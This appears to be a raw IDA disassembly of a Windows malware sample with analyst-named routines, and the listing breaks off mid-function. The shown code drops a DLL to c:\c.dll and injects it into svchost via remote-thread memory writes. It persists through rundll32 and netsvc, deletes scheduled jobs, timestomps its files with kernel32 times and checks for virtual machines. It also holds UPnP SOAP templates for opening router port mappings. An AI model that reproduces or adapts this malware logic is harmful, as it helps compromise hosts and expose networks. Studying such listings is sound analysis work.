dd 5C250812h, 8D004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDDD00h, 21411h
dd 20012h, 300315h, 3 dup(8080808h), 115B5Ch, 1B0002h
dd 280001h, 0Ch, 8B75B02h, 0
dd 0FA00h, 5C080811h, 20011h, 2011Bh, 0C0028h, 5B050000h
dd 8B7h, 0FA000000h, 4110000h, 0A0300002h, 4110000h, 0E1300002h
dd 14110000h, 11F646h, 11F652h, 82B0002h, 40028h, 20001h
dd 40120h, 0
dd 1FD2Ah, 0FDCA0000h, 2, 3FE4Ch, 0FED60000h, 110000h
dd 1D0008h, 5B010008h, 100315h, 4C060608h, 5BFFF100h, 3C0011h
dd 140316h, 5C465C4Bh, 100010h, 5C250812h, 0DD004C5Bh
dd 5B5C08FFh, 14031Bh, 18h, 5C4B0001h, 144948h, 10000h
dd 100010h, 5C250812h, 0C9004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFD0h, 115B08h, 11B0002h, 280002h
dd 10010h, 14125B05h, 120002h, 31B0012h, 80008h, 1FFFCh
dd 0F8E8004Ch, 3185B5Ch, 0FFEC0004h, 49485C4Bh, 40008h
dd 80001h, 8120008h, 85B5C25h, 115B5Ch, 82B0002h, 40028h
dd 20001h, 40120h, 0
dd 1FC52h, 0FCF20000h, 2, 3FD74h, 0FDFE0000h, 0
dd 3C0000h, 0A20072h, 12000E4h, 186015Ch, 1F801B6h, 2760240h
dd 2E802A0h, 34E0318h, 3C0038Ah, 42C03FCh, 48C045Ch, 4F204BCh
dd 5700534h, 5DC05A0h, 636060Ch, 6A2066Ch, 72606EAh, 79E075Ch
dd 81607DAh, 876084Ch, 8EE08B2h, 960091Eh, 9D2098Ah, 0A380A02h
dd 0AAA0A68h, 0B100AE0h, 0B8E0B64h, 0
; const MIDL_STUB_DESC pStubDescriptor
pStubDescriptor MIDL_STUB_DESC <offset dword_9A4BB0, offset sub_9AA62A, \
; DATA XREF: sub_9AFF71+D�o
; sub_9AFF93+D�o
offset loc_9AA638, <offset Binding>, 0, 0, 0, 0, \
offset word_9A57C2, 1, 50002h, 0, 600016Eh, 0, 0, 0, \
1, 0, 0, 0>
byte_9A69D0 db 0 ; DATA XREF: sub_validate_hostlong_and_bsearch+44�r
byte_9A69D1 db 10h ; DATA XREF: sub_validate_hostlong_and_bsearch+4C�r
word_9A69D2 dw 1 ; DATA XREF: sub_validate_hostlong_and_bsearch+54�r
dd 4161111h, 8041212h, 41613h, 51717h, 61818h, 131C19h
dd 0B1D1Dh, 0C391Eh, 73E3Ah, 8403Fh, 0E4141h, 0D4545h
dd 104442h, 114646h, 124847h, 144B49h, 154C4Ch, 16524Dh
dd 195C53h, 0A6F5Dh, 1D7170h, 1F7272h
; char SubBlock[]
SubBlock db '\VarFileInfo\Translation',0 ; DATA XREF: sub_9AFFB5+95�o
align 4
stru_9A6A48 _msEH <0FFFFFFFFh, offset loc_9B0084, offset loc_9B0088>
; DATA XREF: sub_9AFFB5+5�o
align 8
stru_9A6A58 _msEH <0FFFFFFFFh, offset loc_9B0201, offset loc_9B0205>
; DATA XREF: sub_validate_hostlong_and_bsearch+2�o
dword_9A6A64 dd 0C516C213h, 6CA09CABh, 0EF0865D8h, 2 dup(0) ; DATA XREF: sub_rc4_part_of_unpakced_dll_file+42�o
stru_9A6A78 _msEH <0FFFFFFFFh, offset loc_9B02E4, offset loc_9B02E8>
; DATA XREF: sub_rc4_part_of_unpakced_dll_file+2�o
align 8
stru_9A6A88 _msEH <0FFFFFFFFh, offset loc_9B03BF, offset loc_9B03C3>
; DATA XREF: sub_9B02F5+5�o
dd 2 dup(0Ch), 2 dup(7), 0Eh, 80h, 4000h, 7Ch, 1000000h
dd 8000h
dword_9A6ABC dd 1F3F3CDDh, 48F359BFh, 5ABC64A1h, 60516632h ; DATA XREF: sub_9B2A03+ED�o
byte_9A6ACC db 19h ; DATA XREF: sub_9B2A03+11D�o
; sub_9B3378+FE�r
db 0Eh, 9, 7
dd 4040505h, 3030304h, 2020202h
; char aGetSHttp1_1Hos[]
aGetSHttp1_1Hos db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B5139+D1�o
db 'Host: %s:%d',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 0Dh,0Ah,0
; char asc_9A6B10[]
asc_9A6B10 db '://',0 ; DATA XREF: sub_check_http_in_string+9�o
aService db 'service',0 ; DATA XREF: sub_9B575F+2A�o
; sub_9B57BA+18�o
; char aUrnSchemasUp_2[]
aUrnSchemasUp_2 db 'urn:schemas-upnp-org:service:WANPPPConnection:1',0
; DATA XREF: .text:009A6D24�o
; sub_9B57BA+A4�o
; char aUrnSchemasUp_1[]
aUrnSchemasUp_1 db 'urn:schemas-upnp-org:service:WANIPConnection:1',0
; DATA XREF: .text:009A6D20�o
; sub_9B57BA:loc_9B584D�o
align 4
; char aUrnSchemasUpnp[]
aUrnSchemasUpnp db 'urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1',0
; DATA XREF: sub_9B57BA+39�o
; sub_9B5DA4+77�o
; char aScpdurl[]
aScpdurl db 'SCPDURL',0 ; DATA XREF: sub_9B58C5:loc_9B592E�o
; char aEventsuburl[]
aEventsuburl db 'eventSubURL',0 ; DATA XREF: sub_9B58C5:loc_9B5915�o
; char aControlurl[]
aControlurl db 'controlURL',0 ; DATA XREF: sub_9B58C5:loc_9B58FC�o
align 4
; char aServicetype[]
aServicetype db 'serviceType',0 ; DATA XREF: sub_9B58C5:loc_9B58E3�o
; char aUrlbase[]
aUrlbase db 'URLBase',0 ; DATA XREF: sub_9B58C5+5�o
; char aPostSHttp1_1Ho[]
aPostSHttp1_1Ho db 'POST %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_build_post_message+51�o
db 'Host: %s%s',0Dh,0Ah
db 'User-Agent: POSIX, UPnP/1.0',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'SOAPAction: "%s"',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 'Cache-Control: no-cache',0Dh,0Ah
db 'Pragma: no-cache',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHu[]
aHu db ':%hu',0 ; DATA XREF: sub_build_post_message+2D�o
align 10h
aContentLength db 'content-length',0 ; DATA XREF: sub_9B5A5F+5�o
align 10h
; char aMSearchHttp1_1[]
aMSearchHttp1_1 db 'M-SEARCH * HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_upnp_broadcast_and_recv+103�o
db 'HOST: 239.255.255.250:1900',0Dh,0Ah
db 'ST: %s',0Dh,0Ah
db 'MAN: "ssdp:discover"',0Dh,0Ah
db 'MX: 3',0Dh,0Ah
db 0Dh,0Ah,0
align 4
off_9A6D1C dd offset aUrnSchemasUp_0 ; DATA XREF: sub_upnp_broadcast_and_recv+E8�o
; "urn:schemas-upnp-org:device:InternetGat"...
dd offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
dd offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
dd offset aUpnpRootdevice ; "upnp:rootdevice"
align 10h
aUpnpRootdevice db 'upnp:rootdevice',0 ; DATA XREF: .text:009A6D28�o
aUrnSchemasUp_0 db 'urn:schemas-upnp-org:device:InternetGatewayDevice:1',0
; DATA XREF: .text:off_9A6D1C�o
aSt db 'st',0 ; DATA XREF: sub_9B5AC7+6C�o
align 4
aLocation db 'location',0 ; DATA XREF: sub_9B5AC7+47�o
align 4
; char aConnected[]
aConnected db 'Connected',0 ; DATA XREF: sub_post_recv_parse_check_if_connected+2B�o
align 10h
; char aSBodySEnvelope[]
aSBodySEnvelope db '></s:Body></s:Envelope>',0Dh,0Ah,0 ; DATA XREF: sub_post_and_recv+102�o
align 10h
; char a?xmlVersion1_1[]
a?xmlVersion1_1 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_post_and_recv+5E�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s">',0
align 10h
; char a?xmlVersion1_0[]
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_post_and_recv+45�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s"></m:%s></s:Body></s:Envelope>',0Dh,0Ah,0
align 10h
; char aSS[]
aSS db '%s#%s',0 ; DATA XREF: sub_post_and_recv+23�o
align 4
; char cp[]
cp db '239.255.255.250',0 ; DATA XREF: sub_upnp_broadcast_and_recv+7F�o
; char aErrorcode[]
aErrorcode db 'errorCode',0 ; DATA XREF: sub_post_recv_and_parse+105�o
; sub_post_and_recv_find_string_ret_0_if_succ+99�o ...
align 4
; char aNewlastconnect[]
aNewlastconnect db 'NewLastConnectionError',0 ; DATA XREF: sub_post_recv_and_parse+86�o
align 4
; char aNewconnections[]
aNewconnections db 'NewConnectionStatus',0 ; DATA XREF: sub_post_recv_and_parse+75�o
; char aNewuptime[]
aNewuptime db 'NewUptime',0 ; DATA XREF: sub_post_recv_and_parse+64�o
align 4
aGetstatusinfo db 'GetStatusInfo',0 ; DATA XREF: sub_post_recv_and_parse+3C�o
align 4
; char aNewexternalipa[]
aNewexternalipa db 'NewExternalIPAddress',0 ; DATA XREF: sub_post_and_recv_find_string_ret_0_if_succ+6D�o
align 4
aGetexternalipa db 'GetExternalIPAddress',0 ; DATA XREF: sub_post_and_recv_find_string_ret_0_if_succ+45�o
align 4
; char aNewleasedurati[]
aNewleasedurati db 'NewLeaseDuration',0 ; DATA XREF: sub_9B6663+BB�o
; sub_9B686F+196�o
align 10h
aAddportmapping db 'AddPortMapping',0 ; DATA XREF: sub_9B6663+B3�o
align 10h
; char aNewportmapping[]
aNewportmapping db 'NewPortMappingDescription',0 ; DATA XREF: sub_9B6663+96�o
; sub_9B686F+16F�o
align 4
; char aNewenabled[]
aNewenabled db 'NewEnabled',0 ; DATA XREF: sub_9B6663+88�o
; sub_9B686F+148�o
align 4
; char aNewinternalcli[]
aNewinternalcli db 'NewInternalClient',0 ; DATA XREF: sub_9B6663+81�o
; sub_9B686F+FF�o ...
align 4
; char aNewinternalpor[]
aNewinternalpor db 'NewInternalPort',0 ; DATA XREF: sub_9B6663+7A�o
; sub_9B686F+125�o ...
; char aNewprotocol[]
aNewprotocol db 'NewProtocol',0 ; DATA XREF: sub_9B6663+70�o
; sub_9B679A+62�o ...
; char aNewexternalpor[]
aNewexternalpor db 'NewExternalPort',0 ; DATA XREF: sub_9B6663+66�o
; sub_9B679A+56�o ...
; char aNewremotehost[]
aNewremotehost db 'NewRemoteHost',0 ; DATA XREF: sub_9B6663+60�o
; sub_9B679A+4D�o ...
align 4
aDeleteportmapp db 'DeletePortMapping',0 ; DATA XREF: sub_9B679A+45�o
align 4
aNewportmappi_0 db 'NewPortMappingIndex',0 ; DATA XREF: sub_9B686F+5A�o
aGetgenericport db 'GetGenericPortMappingEntry',0 ; DATA XREF: sub_9B686F+4C�o
align 4
aGetspecificpor db 'GetSpecificPortMappingEntry',0 ; DATA XREF: sub_9B6A70+5D�o
dd 89ABCDEFh, 1234567h, 2425CFA0h, 7311C281h
; ---------------------------------------------------------------------------
loc_9A70D8: ; DATA XREF: sub_9B7937+B6�o
mov al, ds:812425CFh
retn 7311h
; ---------------------------------------------------------------------------
dd 34AAC8E7h, 64322864h, 0EF68B7C1h, 0B60450E9h, 8D9F06F1h
dd 0E8FB2390h, 0A691E5BFh, 0DD2E76CBh, 2C30BC41h, 0CD0D63Bh
dd 23058F8Ah, 1F8CCF68h, 88E3775Dh, 54E5ED5Bh, 0A6D6031h
dd 4AD12AAEh, 88222E0Dh, 3E7F16BBh, 3FB50C2Ch, 8AF8671Dh
dd 8BD25C31h, 995AD117h, 4C4B633h, 0C878C1DDh, 7A1552ACh
dd 3B72066Ch, 631EFFCBh, 0D6F3522h
byte_9A7150 db 30h ; DATA XREF: sub_9B7CA3+38�r
; sub_9B7CA3+4B�r
a123456789abcde db '123456789abcdef',0
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A7170 proc near ; CODE XREF: StartAddress:loc_9A77D0�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
Data = byte ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
push ebx
push esi
push edi
push 26h
pop ecx
xor eax, eax
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+78h+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov dword ptr [ebp+78h+Data], 0Ah
call ds:GetVersionExA
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A71FC
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A71B9
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A71FC
cmp [ebp+78h+var_C], 2
jnb short loc_9A71FC
loc_9A71B9: ; CODE XREF: sub_9A7170+3A�j
lea eax, [ebp+78h+Data]
push eax ; lpData
mov ebx, offset dword_9A1484
push ebx ; lpValueName
mov edi, offset dword_9A1450
push edi ; lpSubKey
mov esi, 80000002h
push esi ; int
call sub_9AD112
add esp, 10h
test eax, eax
jnz short loc_9A71E4
mov dword ptr [ebp+78h+Data], 0FFFFFEh
jmp short loc_9A721A
; ---------------------------------------------------------------------------
loc_9A71E4: ; CODE XREF: sub_9A7170+69�j
mov eax, 0FFFFFEh
cmp dword ptr [ebp+78h+Data], eax
jz short loc_9A721A
push eax ; Data
push ebx ; lpValueName
push edi ; lpSubKey
push esi ; hKey
call sub_9AD0F4
add esp, 10h
jmp short loc_9A721A
; ---------------------------------------------------------------------------
loc_9A71FC: ; CODE XREF: sub_9A7170+34�j
; sub_9A7170+40�j ...
push 1 ; int
push offset Name ; lpName
call sub_9AC5D7
pop ecx
pop ecx
call sub_9A812E
test eax, eax
jz short loc_9A721A
mov dword ptr [ebp+78h+Data], 10000000h
loc_9A721A: ; CODE XREF: sub_9A7170+72�j
; sub_9A7170+7C�j ...
mov eax, dword ptr [ebp+78h+Data]
pop edi
pop esi
mov dword_9BAE64, eax
pop ebx
add ebp, 78h
leave
retn
sub_9A7170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A722A proc near ; CODE XREF: StartAddress+25�p
; StartAddress+92�p ...
Str1 = byte ptr -208h
Str = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 40h
xor eax, eax
pop ecx
xor ebx, ebx
mov [ebp+Str], bl
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+Str]
push eax ; Str
mov esi, offset FileName ; "c:\\c.dll"
push esi ; int
call sub_9AD279
pop ecx
pop ecx
push 104h ; uSize
lea eax, [ebp+Str1]
push eax ; lpBuffer
call ds:GetSystemDirectoryA
push 3 ; MaxCount
lea eax, [ebp+Str]
push eax ; Str
lea eax, [ebp+Str1]
push eax ; Str1
call ds:_strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_9A72C0
push esi ; Str
call strlen
cmp eax, 4
pop ecx
jbe short loc_9A72BB
push offset dword_9A1498 ; Str2
push esi ; Str
call strlen
sub esi, 4
pop ecx
add eax, esi
push eax ; Str1
call ds:_strcmpi
test eax, eax
pop ecx
pop ecx
jz short loc_9A72C3
loc_9A72BB: ; CODE XREF: sub_9A722A+71�j
or ebx, 0FFFFFFFFh
jmp short loc_9A72C3
; ---------------------------------------------------------------------------
loc_9A72C0: ; CODE XREF: sub_9A722A+65�j
push 0FFFFFFFEh
pop ebx
loc_9A72C3: ; CODE XREF: sub_9A722A+8F�j
; sub_9A722A+94�j
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A722A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A72CA proc near ; CODE XREF: sub_main+118�p
pSid1 = dword ptr -28h
var_24 = dword ptr -24h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -20h
var_18 = dword ptr -18h
hObject = dword ptr -14h
var_10 = dword ptr -10h
ReturnLength = dword ptr -0Ch
pSid2 = dword ptr -8
pSid = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
lea eax, [ebp+hObject]
push eax ; TokenHandle
xor ebx, ebx
push 8 ; DesiredAccess
mov [ebp+var_18], ebx
call ds:GetCurrentProcess
push eax ; ProcessHandle
call ds:OpenProcessToken
test eax, eax
jz loc_9A740A
push esi
mov esi, ds:GetTokenInformation
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push ebx ; TokenInformationLength
push ebx ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jnz loc_9A7400
call ds:GetLastError
cmp eax, 7Ah
jnz loc_9A7400
push edi
push [ebp+ReturnLength] ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov edi, eax
cmp edi, ebx
jz loc_9A73FF
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push [ebp+ReturnLength] ; TokenInformationLength
push edi ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jz loc_9A73F8
mov esi, ds:AllocateAndInitializeSid
lea eax, [ebp+pSid2]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 4 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
mov [ebp+pSid2], ebx
mov [ebp+pSid], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
call esi ; AllocateAndInitializeSid
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 6 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call esi ; AllocateAndInitializeSid
cmp [edi], ebx
mov [ebp+var_18], 1
mov [ebp+var_10], ebx
jbe short loc_9A73DE
lea esi, [edi+4]
loc_9A73A3: ; CODE XREF: sub_9A72CA+10D�j
mov eax, [esi]
push [ebp+pSid2] ; pSid2
mov ecx, [esi+4]
push eax ; pSid1
mov [ebp+pSid1], eax
mov [ebp+var_24], ecx
call ds:EqualSid
test eax, eax
jnz short loc_9A73DB
push [ebp+pSid] ; pSid2
push [ebp+pSid1] ; pSid1
call ds:EqualSid
test eax, eax
jnz short loc_9A73DE
inc [ebp+var_10]
mov eax, [ebp+var_10]
add esi, 8
cmp eax, [edi]
jb short loc_9A73A3
jmp short loc_9A73DE
; ---------------------------------------------------------------------------
loc_9A73DB: ; CODE XREF: sub_9A72CA+F0�j
mov [ebp+var_18], ebx
loc_9A73DE: ; CODE XREF: sub_9A72CA+D4�j
; sub_9A72CA+100�j ...
cmp [ebp+pSid], ebx
mov esi, ds:FreeSid
jz short loc_9A73EE
push [ebp+pSid] ; pSid
call esi ; FreeSid
loc_9A73EE: ; CODE XREF: sub_9A72CA+11D�j
cmp [ebp+pSid2], ebx
jz short loc_9A73F8
push [ebp+pSid2] ; pSid
call esi ; FreeSid
loc_9A73F8: ; CODE XREF: sub_9A72CA+79�j
; sub_9A72CA+127�j
push edi ; hMem
call ds:GlobalFree
loc_9A73FF: ; CODE XREF: sub_9A72CA+62�j
pop edi
loc_9A7400: ; CODE XREF: sub_9A72CA+3D�j
; sub_9A72CA+4C�j
push [ebp+hObject] ; hObject
call ds:CloseHandle
pop esi
loc_9A740A: ; CODE XREF: sub_9A72CA+21�j
mov eax, [ebp+var_18]
pop ebx
leave
retn
sub_9A72CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7410 proc near ; CODE XREF: sub_main+17B�p
First = byte ptr -114h
TotalEntries = dword ptr -10h
var_C = dword ptr -0Ch
EntriesRead = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 114h
push esi
xor esi, esi
push esi ; ResumeHandle
lea eax, [ebp+TotalEntries]
push eax ; TotalEntries
lea eax, [ebp+EntriesRead]
push eax ; EntriesRead
push 0FFFFFFFFh ; PrefferedMaximumLength
lea eax, [ebp+Buffer]
push eax ; PointerToBuffer
push esi ; Servername
mov [ebp+EntriesRead], esi
mov [ebp+Buffer], esi
call NetScheduleJobEnum
cmp [ebp+EntriesRead], esi
mov [ebp+var_C], esi
jbe loc_9A74D1
push ebx
push edi
xor ebx, ebx
loc_9A7447: ; CODE XREF: sub_9A7410+B9�j
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push 104h ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
mov eax, [ebp+Buffer]
push 0FFFFFFFFh ; cchWideChar
push dword ptr [ebx+eax+10h] ; lpWideCharStr
push esi ; dwFlags
push esi ; CodePage
call ds:WideCharToMultiByte
test eax, eax
jz short loc_9A74BD
push 5Ch ; Ch
push offset FileName ; "c:\\c.dll"
call ds:strrchr
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jnz short loc_9A7486
mov edi, offset FileName ; "c:\\c.dll"
jmp short loc_9A7487
; ---------------------------------------------------------------------------
loc_9A7486: ; CODE XREF: sub_9A7410+6D�j
inc edi
loc_9A7487: ; CODE XREF: sub_9A7410+74�j
push offset Srch ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call ds:StrStrIA
test eax, eax
jz short loc_9A74BD
push edi ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call ds:StrStrIA
test eax, eax
jz short loc_9A74BD
mov eax, [ebp+Buffer]
mov eax, [ebx+eax]
push eax ; MaxJobId
push eax ; MinJobId
push esi ; Servername
call NetScheduleJobDel
loc_9A74BD: ; CODE XREF: sub_9A7410+58�j
; sub_9A7410+8B�j ...
inc [ebp+var_C]
mov eax, [ebp+var_C]
add ebx, 14h
cmp eax, [ebp+EntriesRead]
jb loc_9A7447
pop edi
pop ebx
loc_9A74D1: ; CODE XREF: sub_9A7410+2D�j
cmp [ebp+Buffer], esi
pop esi
jz short locret_9A74DF
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
locret_9A74DF: ; CODE XREF: sub_9A7410+C5�j
leave
retn
sub_9A7410 endp
; =============== S U B R O U T I N E =======================================
sub_9A74E1 proc near ; CODE XREF: sub_main+13B�p
push esi
push edi
push offset dword_9A14C0 ; lpSrch
xor edi, edi
call sub_find_svchost_process_id
test eax, eax
pop ecx
mov esi, offset FileName ; "c:\\c.dll"
jz short loc_9A7506
push esi ; lpBuffer
push eax ; dwProcessId
call sub_CreateRemoteThreasandwriteProcessMemory
test eax, eax
pop ecx
pop ecx
jnz short loc_9A7522
loc_9A7506: ; CODE XREF: sub_9A74E1+16�j
push offset dword_9A14B0 ; Str2
call sub_find_process_handle_by_name
test eax, eax
pop ecx
jz short loc_9A7525
push esi ; lpBuffer
push eax ; dwProcessId
call sub_CreateRemoteThreasandwriteProcessMemory
test eax, eax
pop ecx
pop ecx
jz short loc_9A7525
loc_9A7522: ; CODE XREF: sub_9A74E1+23�j
xor edi, edi
inc edi
loc_9A7525: ; CODE XREF: sub_9A74E1+32�j
; sub_9A74E1+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_9A74E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_run_dll proc near ; CODE XREF: sub_call_run_dll+6E�p
; sub_call_run_dll+C7�p ...
NewFileName = byte ptr -120h
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
hMem = dword ptr -0Ch
nNumberOfBytesToWrite= dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 120h
mov eax, dword_9BAF74
push ebx
push esi
xor eax, 45419005h
push edi
push eax ; Seed
call ds:srand
call ds:rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_1C]
add edx, 5
push edx
push eax
call sub_make_array_of_alphabet
call sub_call_srand_with_seed_from_thread_id
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
mov edi, 104h
push offset aF ; ""
lea eax, [ebp+NewFileName]
push edi ; Count
push eax ; Dest
call ds:_snprintf
lea eax, [ebp+NewFileName]
push 1F01FFh ; int
xor ebx, ebx
push eax ; lpFileName
mov [ebp+var_1D], bl
call sub_9AD15E
add esp, 28h
cmp [ebp+arg_4], 0FFFFFFFFh
mov [ebp+var_4], ebx
mov esi, offset FileName ; "c:\\c.dll"
jnz short loc_9A75C6
lea eax, [ebp+NewFileName]
push eax ; lpNewFileName
push esi ; lpExistingFileName
call ds:MoveFileA
test eax, eax
jz short loc_9A75C6
mov [ebp+var_4], 1
jmp short loc_9A7621
; ---------------------------------------------------------------------------
loc_9A75C6: ; CODE XREF: sub_run_dll+7F�j
; sub_run_dll+91�j
lea eax, [ebp+nNumberOfBytesToWrite]
push esi ; lpFileName
push eax ; int
mov [ebp+nNumberOfBytesToWrite], ebx
call sub_9AC769
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+hMem], eax
jz loc_9A7668
cmp [ebp+nNumberOfBytesToWrite], ebx
jz short loc_9A7613
lea ecx, [ebp+NewFileName]
push ecx ; lpFileName
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push eax ; lpBuffer
call sub_create_file_and_set_tile_to_kernel32_time
add esp, 0Ch
test eax, eax
jz short loc_9A7613
cmp [ebp+arg_4], 0FFFFFFFFh
mov [ebp+var_4], 1
jnz short loc_9A7613
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call ds:MoveFileExA
loc_9A7613: ; CODE XREF: sub_run_dll+B9�j
; sub_run_dll+D0�j ...
push [ebp+hMem] ; hMem
call ds:GlobalFree
cmp [ebp+var_4], ebx
jz short loc_9A7668
loc_9A7621: ; CODE XREF: sub_run_dll+9A�j
lea eax, [ebp+NewFileName]
push eax ; lpFileName
call sub_set_file_time_to_kernel32_time
lea eax, [ebp+NewFileName]
push eax ; lpMultiByteStr
call sub_setup_run_dll32_and_netsvc
push edi ; Count
lea eax, [ebp+NewFileName]
push eax ; Source
push esi ; Dest
call ds:strncpy
add esp, 14h
mov byte_9BAF6B, bl
call ds:GetVersion
cmp al, 6
jb short loc_9A7668
push ebx ; int
push offset CommandLine ; lpCommandLine
call sub_call_create_process
pop ecx
pop ecx
loc_9A7668: ; CODE XREF: sub_run_dll+B0�j
; sub_run_dll+F5�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_run_dll endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_call_run_dll proc near ; CODE XREF: StartAddress+31�p
Buffer = byte ptr -104h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
sldt ax
xor ebx, ebx
cmp ax, bx
jz short loc_9A76C1
cmp [ebp+arg_0], 0FFFFFFFEh
mov esi, offset FileName ; "c:\\c.dll"
jz short loc_9A76B4
push 1F01FFh ; int
push esi ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call ds:MoveFileExA
loc_9A76A7: ; CODE XREF: sub_call_run_dll+4F�j
cmp [ebp+arg_0], 0FFFFFFFEh
jz short loc_9A76B4
push esi ; lpFileName
call ds:DeleteFileA
loc_9A76B4: ; CODE XREF: sub_call_run_dll+1E�j
; sub_call_run_dll+3B�j
push 1388h ; dwMilliseconds
call ds:Sleep
jmp short loc_9A76A7
; ---------------------------------------------------------------------------
loc_9A76C1: ; CODE XREF: sub_call_run_dll+13�j
mov esi, 104h
push esi ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_run_dll
test eax, eax
pop ecx
pop ecx
jnz loc_9A7785
push edi
mov edi, ds:SHGetSpecialFolderPathA
push ebx ; fCreate
push 26h ; csidl
lea eax, [ebp+Buffer]
push eax ; pszPath
push ebx ; hwnd
call edi ; SHGetSpecialFolderPathA
call ds:rand
cdq
push 2
pop ecx
idiv ecx
mov eax, offset Source
test edx, edx
jnz short loc_9A771B
mov eax, offset dword_9A1530
loc_9A771B: ; CODE XREF: sub_call_run_dll+A4�j
push esi ; Count
push eax ; Source
lea eax, [ebp+Buffer]
push eax ; Dest
call ds:strncat
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
mov [ebp+var_1], bl
call sub_run_dll
add esp, 14h
test eax, eax
jnz short loc_9A7784
push ebx ; fCreate
push 1Ah ; csidl
lea eax, [ebp+Buffer]
push eax ; pszPath
